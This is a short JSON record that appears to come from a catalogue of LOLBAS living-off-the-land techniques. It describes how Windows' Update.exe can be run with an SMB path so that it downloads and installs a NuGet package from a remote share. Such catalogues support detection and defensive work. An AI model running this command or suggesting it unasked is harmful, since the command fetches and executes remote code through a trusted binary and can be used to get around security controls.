{
  "id": "lolbas-update-exe-execute-2",
  "name": "LOLBAS · Update.exe (Execute) #2",
  "command": "Update.exe --update={PATH_SMB:folder}",
  "description": "The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.",
  "platform": "windows",
  "tags": [
    "lolbas",
    "update",
    "execute"
  ],
  "source": "lolbas",
  "source_url": "https://lolbas-project.github.io/lolbas/Update/",
  "upstream_id": "Update.exe/Execute/1",
  "category": "lolbas",
  "subcategory": "execute",
  "references": [
    {
      "title": "LOLBAS — Update.exe",
      "url": "https://lolbas-project.github.io/lolbas/Update/"
    }
  ]
}
